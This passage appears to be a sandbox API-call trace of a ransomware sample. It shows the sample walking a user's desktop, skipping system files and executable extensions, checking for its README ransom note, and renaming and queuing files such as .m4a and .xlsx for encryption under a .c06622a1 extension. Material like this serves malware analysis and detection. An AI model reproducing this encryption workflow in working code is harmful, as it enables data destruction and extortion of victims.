_wcsicmp (_Str1="wpx", _Str2="m4a") returned 10 [0156.797] wcslen (_String="wpx") returned 0x3 [0156.797] _wcsicmp (_Str1="lock", _Str2="m4a") returned -1 [0156.797] wcslen (_String="lock") returned 0x4 [0156.797] _wcsicmp (_Str1="key", _Str2="m4a") returned -2 [0156.797] wcslen (_String="key") returned 0x3 [0156.797] _wcsicmp (_Str1="hta", _Str2="m4a") returned -5 [0156.797] wcslen (_String="hta") returned 0x3 [0156.798] _wcsicmp (_Str1="msi", _Str2="m4a") returned 63 [0156.798] wcslen (_String="msi") returned 0x3 [0156.798] _wcsicmp (_Str1="pdb", _Str2="m4a") returned 3 [0156.798] wcslen (_String="pdb") returned 0x3 [0156.798] _wcsicmp (_Str1="sqlite", _Str2="m4a") returned 6 [0156.798] wcslen (_String="sqlite") returned 0x6 [0156.798] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\zNgiUMtwIx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\zngiumtwix")) returned 0x10 [0156.798] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x3240060 [0156.798] wcscpy (in: _Dest=0x3240060, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\zNgiUMtwIx" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\zNgiUMtwIx") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\zNgiUMtwIx" [0156.798] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\zNgiUMtwIx") returned 0x34 [0156.798] wcscpy (in: _Dest=0x32400ca, _Source="aaTy.m4a" | out: _Dest="aaTy.m4a") returned="aaTy.m4a" [0156.798] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\zNgiUMtwIx\\aaTy.m4a", dwFileAttributes=0x80) returned 1 [0156.798] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\zNgiUMtwIx\\aaTy.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\zngiumtwix\\aaty.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1e0 [0156.798] SetFilePointerEx (in: hFile=0x1e0, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0156.799] ReadFile (in: hFile=0x1e0, lpBuffer=0x32e9a4, nNumberOfBytesToRead=0x90, lpNumberOfBytesRead=0x32ea34, lpOverlapped=0x0 | out: lpBuffer=0x32e9a4*, lpNumberOfBytesRead=0x32ea34*=0x90, lpOverlapped=0x0) returned 1 [0156.799] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x32e9a4, Length=0x80) returned 0x71c5a0df [0156.799] RtlComputeCrc32 (PartialCrc=0xa0df, Buffer=0x32e9a4, Length=0x80) returned 0x6a8761f2 [0156.799] RtlComputeCrc32 (PartialCrc=0x61f2, Buffer=0x32e9a4, Length=0x80) returned 0xb52ef1dc [0156.800] RtlComputeCrc32 (PartialCrc=0xf1dc, Buffer=0x32e9a4, Length=0x80) returned 0x961da691 [0156.800] RtlComputeCrc32 (PartialCrc=0xa691, Buffer=0x32e9a4, Length=0x80) returned 0xf31781df [0156.800] CloseHandle (hObject=0x1e0) returned 1 [0156.800] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x3250068 [0156.800] wcscpy (in: _Dest=0x3250068, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\zNgiUMtwIx\\aaTy.m4a" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\zNgiUMtwIx\\aaTy.m4a") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\zNgiUMtwIx\\aaTy.m4a" [0156.800] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\zNgiUMtwIx\\aaTy.m4a") returned 0x3d [0156.800] wcscpy (in: _Dest=0x32500e2, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0156.800] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\zNgiUMtwIx\\aaTy.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\zngiumtwix\\aaty.m4a"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\zNgiUMtwIx\\aaTy.m4a.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\zngiumtwix\\aaty.m4a.c06622a1"), dwFlags=0x8) returned 1 [0156.802] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\zNgiUMtwIx\\aaTy.m4a.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\zngiumtwix\\aaty.m4a.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x1e0 [0156.802] CreateIoCompletionPort (FileHandle=0x1e0, ExistingCompletionPort=0xd8, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0xd8 [0156.802] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x80104) returned 0x35a0020 [0156.812] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x530fb525 [0156.812] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x665960cc [0156.812] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0xa131d46 [0156.812] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x906b5ce [0156.812] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x54db757d [0156.812] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0xad05a7b [0156.812] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x338989ad [0156.812] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x5df7a39a [0156.815] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x35a0094, Length=0x80) returned 0xeea1da27 [0156.815] RtlComputeCrc32 (PartialCrc=0xda27, Buffer=0x35a0094, Length=0x80) returned 0x30f9d891 [0156.815] RtlComputeCrc32 (PartialCrc=0xd891, Buffer=0x35a0094, Length=0x80) returned 0x70abb4b9 [0156.815] RtlComputeCrc32 (PartialCrc=0xb4b9, Buffer=0x35a0094, Length=0x80) returned 0x70087aa2 [0156.815] RtlComputeCrc32 (PartialCrc=0x7aa2, Buffer=0x35a0094, Length=0x80) returned 0x3be2018d [0156.815] PostQueuedCompletionStatus (CompletionPort=0xd8, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x35a0020) returned 1 [0156.816] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3240060) returned 1 [0156.816] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3250068) returned 1 [0156.816] FindNextFileW (in: hFindFile=0x154148, lpFindFileData=0x32eb1c | out: lpFindFileData=0x32eb1c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb8e42040, ftCreationTime.dwHighDateTime=0x1d5e2d4, ftLastAccessTime.dwLowDateTime=0x3aba380, ftLastAccessTime.dwHighDateTime=0x1d5e714, ftLastWriteTime.dwLowDateTime=0x3aba380, ftLastWriteTime.dwHighDateTime=0x1d5e714, nFileSizeHigh=0x0, nFileSizeLow=0xa620, dwReserved0=0x0, dwReserved1=0x0, cFileName="fQBpM58x.xlsx", cAlternateFileName="FQBPM5~1.XLS")) returned 1 [0156.816] _wcsicmp (_Str1="fQBpM58x.xlsx", _Str2="README.c06622a1.TXT") returned -12 [0156.816] wcsstr (_Str="fQBpM58x.xlsx", _SubStr="README") returned 0x0 [0156.816] _wcsicmp (_Str1="autorun.inf", _Str2="fQBpM58x.xlsx") returned -5 [0156.816] wcslen (_String="autorun.inf") returned 0xb [0156.816] _wcsicmp (_Str1="boot.ini", _Str2="fQBpM58x.xlsx") returned -4 [0156.816] wcslen (_String="boot.ini") returned 0x8 [0156.816] _wcsicmp (_Str1="bootfont.bin", _Str2="fQBpM58x.xlsx") returned -4 [0156.816] wcslen (_String="bootfont.bin") returned 0xc [0156.816] _wcsicmp (_Str1="bootsect.bak", _Str2="fQBpM58x.xlsx") returned -4 [0156.816] wcslen (_String="bootsect.bak") returned 0xc [0156.816] _wcsicmp (_Str1="desktop.ini", _Str2="fQBpM58x.xlsx") returned -2 [0156.816] wcslen (_String="desktop.ini") returned 0xb [0156.816] _wcsicmp (_Str1="iconcache.db", _Str2="fQBpM58x.xlsx") returned 3 [0156.816] wcslen (_String="iconcache.db") returned 0xc [0156.816] _wcsicmp (_Str1="ntldr", _Str2="fQBpM58x.xlsx") returned 8 [0156.816] wcslen (_String="ntldr") returned 0x5 [0156.816] _wcsicmp (_Str1="ntuser.dat", _Str2="fQBpM58x.xlsx") returned 8 [0156.816] wcslen (_String="ntuser.dat") returned 0xa [0156.816] _wcsicmp (_Str1="ntuser.dat.log", _Str2="fQBpM58x.xlsx") returned 8 [0156.816] wcslen (_String="ntuser.dat.log") returned 0xe [0156.816] _wcsicmp (_Str1="ntuser.ini", _Str2="fQBpM58x.xlsx") returned 8 [0156.816] wcslen (_String="ntuser.ini") returned 0xa [0156.817] _wcsicmp (_Str1="thumbs.db", _Str2="fQBpM58x.xlsx") returned 14 [0156.817] wcslen (_String="thumbs.db") returned 0x9 [0156.817] _wcsicmp (_Str1="386", _Str2="xlsx") returned -69 [0156.817] wcslen (_String="386") returned 0x3 [0156.817] _wcsicmp (_Str1="adv", _Str2="xlsx") returned -23 [0156.817] wcslen (_String="adv") returned 0x3 [0156.817] _wcsicmp (_Str1="ani", _Str2="xlsx") returned -23 [0156.817] wcslen (_String="ani") returned 0x3 [0156.817] _wcsicmp (_Str1="bat", _Str2="xlsx") returned -22 [0156.817] wcslen (_String="bat") returned 0x3 [0156.817] _wcsicmp (_Str1="bin", _Str2="xlsx") returned -22 [0156.817] wcslen (_String="bin") returned 0x3 [0156.817] _wcsicmp (_Str1="cab", _Str2="xlsx") returned -21 [0156.817] wcslen (_String="cab") returned 0x3 [0156.817] _wcsicmp (_Str1="cmd", _Str2="xlsx") returned -21 [0156.817] wcslen (_String="cmd") returned 0x3 [0156.817] _wcsicmp (_Str1="com", _Str2="xlsx") returned -21 [0156.817] wcslen (_String="com") returned 0x3 [0156.817] _wcsicmp (_Str1="cpl", _Str2="xlsx") returned -21 [0156.817] wcslen (_String="cpl") returned 0x3 [0156.817] _wcsicmp (_Str1="cur", _Str2="xlsx") returned -21 [0156.817] wcslen (_String="cur") returned 0x3 [0156.817] _wcsicmp (_Str1="deskthemepack", _Str2="xlsx") returned -20 [0156.817] wcslen (_String="deskthemepack") returned 0xd [0156.817] _wcsicmp (_Str1="diagcab", _Str2="xlsx") returned -20 [0156.817] wcslen (_String="diagcab") returned 0x7 [0156.817] _wcsicmp (_Str1="diagcfg", _Str2="xlsx") returned -20 [0156.817] wcslen (_String="diagcfg") returned 0x7 [0156.817] _wcsicmp (_Str1="diagpkg", _Str2="xlsx") returned -20 [0156.817] wcslen (_String="diagpkg") returned 0x7 [0156.818] _wcsicmp (_Str1="dll", _Str2="xlsx") returned -20 [0156.818] wcslen (_String="dll") returned 0x3 [0156.818] _wcsicmp (_Str1="drv", _Str2="xlsx") returned -20 [0156.818] wcslen (_String="drv") returned 0x3 [0156.818] _wcsicmp (_Str1="exe", _Str2="xlsx") returned -19 [0156.818] wcslen (_String="exe") returned 0x3 [0156.818] _wcsicmp (_Str1="hlp", _Str2="xlsx") returned -16 [0156.818] wcslen (_String="hlp") returned 0x3 [0156.818] _wcsicmp (_Str1="icl", _Str2="xlsx") returned -15 [0156.818] wcslen (_String="icl") returned 0x3 [0156.818] _wcsicmp (_Str1="icns", _Str2="xlsx") returned -15 [0156.818] wcslen (_String="icns") returned 0x4 [0156.818] _wcsicmp (_Str1="ico", _Str2="xlsx") returned -15 [0156.818] wcslen (_String="ico") returned 0x3 [0156.818] _wcsicmp (_Str1="ics", _Str2="xlsx") returned -15 [0156.818] wcslen (_String="ics") returned 0x3 [0156.818] _wcsicmp (_Str1="idx", _Str2="xlsx") returned -15 [0156.818] wcslen (_String="idx") returned 0x3 [0156.818] _wcsicmp (_Str1="ldf", _Str2="xlsx") returned -12 [0156.818] wcslen (_String="ldf") returned 0x3 [0156.818] _wcsicmp (_Str1="lnk", _Str2="xlsx") returned -12 [0156.818] wcslen (_String="lnk") returned 0x3 [0156.818] _wcsicmp (_Str1="mod", _Str2="xlsx") returned -11 [0156.818] wcslen (_String="mod") returned 0x3 [0156.818] _wcsicmp (_Str1="mpa", _Str2="xlsx") returned -11 [0156.818] wcslen (_String="mpa") returned 0x3 [0156.818] _wcsicmp (_Str1="msc", _Str2="xlsx") returned -11 [0156.818] wcslen (_String="msc") returned 0x3 [0156.818] _wcsicmp (_Str1="msp", _Str2="xlsx") returned -11 [0156.818] wcslen (_String="msp") returned 0x3 [0156.818] _wcsicmp (_Str1="msstyles", _Str2="xlsx") returned -11 [0156.819] wcslen (_String="msstyles") returned 0x8 [0156.819] _wcsicmp (_Str1="msu", _Str2="xlsx") returned -11 [0156.819] wcslen (_String="msu") returned 0x3 [0156.819] _wcsicmp (_Str1="nls", _Str2="xlsx") returned -10 [0156.819] wcslen (_String="nls") returned 0x3 [0156.819] _wcsicmp (_Str1="nomedia", _Str2="xlsx") returned -10 [0156.819] wcslen (_String="nomedia") returned 0x7 [0156.819] _wcsicmp (_Str1="ocx", _Str2="xlsx") returned -9 [0156.819] wcslen (_String="ocx") returned 0x3 [0156.819] _wcsicmp (_Str1="prf", _Str2="xlsx") returned -8 [0156.819] wcslen (_String="prf") returned 0x3 [0156.819] _wcsicmp (_Str1="ps1", _Str2="xlsx") returned -8 [0156.819] wcslen (_String="ps1") returned 0x3 [0156.819] _wcsicmp (_Str1="rom", _Str2="xlsx") returned -6 [0156.819] wcslen (_String="rom") returned 0x3 [0156.819] _wcsicmp (_Str1="rtp", _Str2="xlsx") returned -6 [0156.819] wcslen (_String="rtp") returned 0x3 [0156.819] _wcsicmp (_Str1="scr", _Str2="xlsx") returned -5 [0156.819] wcslen (_String="scr") returned 0x3 [0156.819] _wcsicmp (_Str1="shs", _Str2="xlsx") returned -5 [0156.819] wcslen (_String="shs") returned 0x3 [0156.819] _wcsicmp (_Str1="spl", _Str2="xlsx") returned -5 [0156.819] wcslen (_String="spl") returned 0x3 [0156.819] _wcsicmp (_Str1="sys", _Str2="xlsx") returned -5 [0156.819] wcslen (_String="sys") returned 0x3 [0156.819] _wcsicmp (_Str1="theme", _Str2="xlsx") returned -4 [0156.819] wcslen (_String="theme") returned 0x5 [0156.819] _wcsicmp (_Str1="themepack", _Str2="xlsx") returned -4 [0156.819] wcslen (_String="themepack") returned 0x9 [0156.819] _wcsicmp (_Str1="wpx", _Str2="xlsx") returned -1 [0156.820] wcslen (_String="wpx") returned 0x3 [0156.820] _wcsicmp (_Str1="lock", _Str2="xlsx") returned -12 [0156.820] wcslen (_String="lock") returned 0x4 [0156.820] _wcsicmp (_Str1="key", _Str2="xlsx") returned -13 [0156.820] wcslen (_String="key") returned 0x3 [0156.820] _wcsicmp (_Str1="hta", _Str2="xlsx") returned -16 [0156.820] wcslen (_String="hta") returned 0x3 [0156.820] _wcsicmp (_Str1="msi", _Str2="xlsx") returned -11 [0156.820] wcslen (_String="msi") returned 0x3 [0156.820] _wcsicmp (_Str1="pdb", _Str2="xlsx") returned -8 [0156.820] wcslen (_String="pdb") returned 0x3 [0156.820] _wcsicmp (_Str1="sqlite", _Str2="xlsx") returned -5 [0156.820] wcslen (_String="sqlite") returned 0x6 [0156.820] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\zNgiUMtwIx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\zngiumtwix")) returned 0x10 [0156.820] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x3240060 [0156.820] wcscpy (in: _Dest=0x3240060, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\zNgiUMtwIx" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\zNgiUMtwIx") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\zNgiUMtwIx" [0156.820] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\zNgiUMtwIx") returned 0x34 [0156.820] wcscpy (in: _Dest=0x32400ca, _Source="fQBpM58x.xlsx" | out: _Dest="fQBpM58x.xlsx") returned="fQBpM58x.xlsx" [0156.820] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\zNgiUMtwIx\\fQBpM58x.xlsx", dwFileAttributes=0x80) returned 1 [0156.821] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\zNgiUMtwIx\\fQBpM58x.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\zngiumtwix\\fqbpm58x.xlsx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x19c [0156.821] SetFilePointerEx (in: hFile=0x19c, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0156.821] ReadFile (in: hFile=0x19c, lpBuffer=0x32e9a4, nNumberOfBytesToRead=0x90, lpNumberOfBytesRead=0x32ea34, lpOverlapped=0x0 | out: lpBuffer=0x32e9a4*, lpNumberOfBytesRead=0x32ea34*=0x90, lpOverlapped=0x0) returned 1 [0156.821] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x32e9a4, Length=0x80) returned 0x800850f4 [0156.822] RtlComputeCrc32 (PartialCrc=0x50f4, Buffer=0x32e9a4, Length=0x80) returned 0xda107e71 [0156.822] RtlComputeCrc32 (PartialCrc=0x7e71, Buffer=0x32e9a4, Length=0x80) returned 0xeafbde03 [0156.822] RtlComputeCrc32 (PartialCrc=0xde03, Buffer=0x32e9a4, Length=0x80) returned 0x76c2599c [0156.822] RtlComputeCrc32 (PartialCrc=0x599c, Buffer=0x32e9a4, Length=0x80) returned 0x6870e1d2 [0156.822] CloseHandle (hObject=0x19c) returned 1 [0156.822] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x3250068 [0156.822] wcscpy (in: _Dest=0x3250068, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\zNgiUMtwIx\\fQBpM58x.xlsx" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\zNgiUMtwIx\\fQBpM58x.xlsx") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\zNgiUMtwIx\\fQBpM58x.xlsx" [0156.822] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\zNgiUMtwIx\\fQBpM58x.xlsx") returned 0x42 [0156.822] wcscpy (in: _Dest=0x32500ec, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0156.822] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\zNgiUMtwIx\\fQBpM58x.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\zngiumtwix\\fqbpm58x.xlsx"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\zNgiUMtwIx\\fQBpM58x.xlsx.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\zngiumtwix\\fqbpm58x.xlsx.c06622a1"), dwFlags=0x8) returned 1 [0156.824] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\zNgiUMtwIx\\fQBpM58x.xlsx.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\zngiumtwix\\fqbpm58x.xlsx.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x19c [0156.824] CreateIoCompletionPort (FileHandle=0x19c, ExistingCompletionPort=0x130, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x130 [0156.824] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x80104) returned 0x3630020 [0156.831] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x1ae06522 [0156.831] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x663b138b [0156.831] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0xe2a6f42 [0156.831] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x58732149 [0156.831] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x3d23068f [0156.831] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x4000348 [0156.831] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x5d873746 [0156.831] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x157b36ef [0156.835] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x3630094, Length=0x80) returned 0x85ea19e3 [0156.835] RtlComputeCrc32 (PartialCrc=0x19e3, Buffer=0x3630094, Length=0x80) returned 0xab3672a0 [0156.835] RtlComputeCrc32 (PartialCrc=0x72a0, Buffer=0x3630094, Length=0x80) returned 0x87aef44 [0156.835] RtlComputeCrc32 (PartialCrc=0xef44, Buffer=0x3630094, Length=0x80) returned 0x97b113bb [0156.835] RtlComputeCrc32 (PartialCrc=0x13bb, Buffer=0x3630094, Length=0x80) returned 0x67f6a014 [0156.835] PostQueuedCompletionStatus (CompletionPort=0x130, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x3630020) returned 1 [0156.835] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3240060) returned 1 [0156.835] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3250068) returned 1 [0156.835] FindNextFileW (in: hFindFile=0x154148, lpFindFileData=0x32eb1c | out: lpFindFileData=0x32eb1c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8f08e10, ftCreationTime.dwHighDateTime=0x1d5e4f7, ftLastAccessTime.dwLowDateTime=0x732c0d80, ftLastAccessTime.dwHighDateTime=0x1d5e075, ftLastWriteTime.dwLowDateTime=0x732c0d80, ftLastWriteTime.dwHighDateTime=0x1d5e075, nFileSizeHigh=0x0, nFileSizeLow=0x54e0, dwReserved0=0x0, dwReserved1=0x0, cFileName="O7sfdfa6z7SFDc0lS.xlsx", cAlternateFileName="O7SFDF~1.XLS")) returned 1 [0156.835] _wcsicmp (_Str1="O7sfdfa6z7SFDc0lS.xlsx", _Str2="README.c06622a1.TXT") returned -3 [0156.835] wcsstr (_Str="O7sfdfa6z7SFDc0lS.xlsx", _SubStr="README") returned 0x0 [0156.835] _wcsicmp (_Str1="autorun.inf", _Str2="O7sfdfa6z7SFDc0lS.xlsx") returned -14 [0156.835] wcslen (_String="autorun.inf") returned 0xb [0156.835] _wcsicmp (_Str1="boot.ini", _Str2="O7sfdfa6z7SFDc0lS.xlsx") returned -13 [0156.835] wcslen (_String="boot.ini") returned 0x8 [0156.835] _wcsicmp (_Str1="bootfont.bin", _Str2="O7sfdfa6z7SFDc0lS.xlsx") returned -13 [0156.835] wcslen (_String="bootfont.bin") returned 0xc [0156.835] _wcsicmp (_Str1="bootsect.bak", _Str2="O7sfdfa6z7SFDc0lS.xlsx") returned -13 [0156.835] wcslen (_String="bootsect.bak") returned 0xc [0156.835] _wcsicmp (_Str1="desktop.ini", _Str2="O7sfdfa6z7SFDc0lS.xlsx") returned -11 [0156.836] wcslen (_String="desktop.ini") returned 0xb [0156.836] _wcsicmp (_Str1="iconcache.db", _Str2="O7sfdfa6z7SFDc0lS.xlsx") returned -6 [0156.836] wcslen (_String="iconcache.db") returned 0xc [0156.836] _wcsicmp (_Str1="ntldr", _Str2="O7sfdfa6z7SFDc0lS.xlsx") returned -1 [0156.836] wcslen (_String="ntldr") returned 0x5 [0156.836] _wcsicmp (_Str1="ntuser.dat", _Str2="O7sfdfa6z7SFDc0lS.xlsx") returned -1 [0156.836] wcslen (_String="ntuser.dat") returned 0xa [0156.836] _wcsicmp (_Str1="ntuser.dat.log", _Str2="O7sfdfa6z7SFDc0lS.xlsx") returned -1 [0156.836] wcslen (_String="ntuser.dat.log") returned 0xe [0156.836] _wcsicmp (_Str1="ntuser.ini", _Str2="O7sfdfa6z7SFDc0lS.xlsx") returned -1 [0156.836] wcslen (_String="ntuser.ini") returned 0xa [0156.836] _wcsicmp (_Str1="thumbs.db", _Str2="O7sfdfa6z7SFDc0lS.xlsx") returned 5 [0156.836] wcslen (_String="thumbs.db") returned 0x9 [0156.836] _wcsicmp (_Str1="386", _Str2="xlsx") returned -69 [0156.836] wcslen (_String="386") returned 0x3 [0156.836] _wcsicmp (_Str1="adv", _Str2="xlsx") returned -23 [0156.836] wcslen (_String="adv") returned 0x3 [0156.836] _wcsicmp (_Str1="ani", _Str2="xlsx") returned -23 [0156.836] wcslen (_String="ani") returned 0x3 [0156.836] _wcsicmp (_Str1="bat", _Str2="xlsx") returned -22 [0156.836] wcslen (_String="bat") returned 0x3 [0156.836] _wcsicmp (_Str1="bin", _Str2="xlsx") returned -22 [0156.836] wcslen (_String="bin") returned 0x3 [0156.836] _wcsicmp (_Str1="cab", _Str2="xlsx") returned -21 [0156.836] wcslen (_String="cab") returned 0x3 [0156.836] _wcsicmp (_Str1="cmd", _Str2="xlsx") returned -21 [0156.836] wcslen (_String="cmd") returned 0x3 [0156.836] _wcsicmp (_Str1="com", _Str2="xlsx") returned -21 [0156.837] wcslen (_String="com") returned 0x3 [0156.837] _wcsicmp (_Str1="cpl", _Str2="xlsx") returned -21 [0156.837] wcslen (_String="cpl") returned 0x3 [0156.837] _wcsicmp (_Str1="cur", _Str2="xlsx") returned -21 [0156.837] wcslen (_String="cur") returned 0x3 [0156.837] _wcsicmp (_Str1="deskthemepack", _Str2="xlsx") returned -20 [0156.837] wcslen (_String="deskthemepack") returned 0xd [0156.837] _wcsicmp (_Str1="diagcab", _Str2="xlsx") returned -20 [0156.837] wcslen (_String="diagcab") returned 0x7 [0156.837] _wcsicmp (_Str1="diagcfg", _Str2="xlsx") returned -20 [0156.837] wcslen (_String="diagcfg") returned 0x7 [0156.837] _wcsicmp (_Str1="diagpkg", _Str2="xlsx") returned -20 [0156.837] wcslen (_String="diagpkg") returned 0x7 [0156.837] _wcsicmp (_Str1="dll", _Str2="xlsx") returned -20 [0156.837] wcslen (_String="dll") returned 0x3 [0156.837] _wcsicmp (_Str1="drv", _Str2="xlsx") returned -20 [0156.837] wcslen (_String="drv") returned 0x3 [0156.837] _wcsicmp (_Str1="exe", _Str2="xlsx") returned -19 [0156.837] wcslen (_String="exe") returned 0x3 [0156.837] _wcsicmp (_Str1="hlp", _Str2="xlsx") returned -16 [0156.837] wcslen (_String="hlp") returned 0x3 [0156.837] _wcsicmp (_Str1="icl", _Str2="xlsx") returned -15 [0156.837] wcslen (_String="icl") returned 0x3 [0156.837] _wcsicmp (_Str1="icns", _Str2="xlsx") returned -15 [0156.837] wcslen (_String="icns") returned 0x4 [0156.837] _wcsicmp (_Str1="ico", _Str2="xlsx") returned -15 [0156.837] wcslen (_String="ico") returned 0x3 [0156.837] _wcsicmp (_Str1="ics", _Str2="xlsx") returned -15 [0156.837] wcslen (_String="ics") returned 0x3 [0156.837] _wcsicmp (_Str1="idx", _Str2="xlsx") returned -15 [0156.837] wcslen (_String="idx") returned 0x3 [0156.837] _wcsicmp (_Str1="ldf", _Str2="xlsx") returned -12 [0156.838] wcslen (_String="ldf") returned 0x3 [0156.838] _wcsicmp (_Str1="lnk", _Str2="xlsx") returned -12 [0156.838] wcslen (_String="lnk") returned 0x3 [0156.838] _wcsicmp (_Str1="mod", _Str2="xlsx") returned -11 [0156.838] wcslen (_String="mod") returned 0x3 [0156.838] _wcsicmp (_Str1="mpa", _Str2="xlsx") returned -11 [0156.838] wcslen (_String="mpa") returned 0x3 [0156.838] _wcsicmp (_Str1="msc", _Str2="xlsx") returned -11 [0156.838] wcslen (_String="msc") returned 0x3 [0156.838] _wcsicmp (_Str1="msp", _Str2="xlsx") returned -11 [0156.838] wcslen (_String="msp") 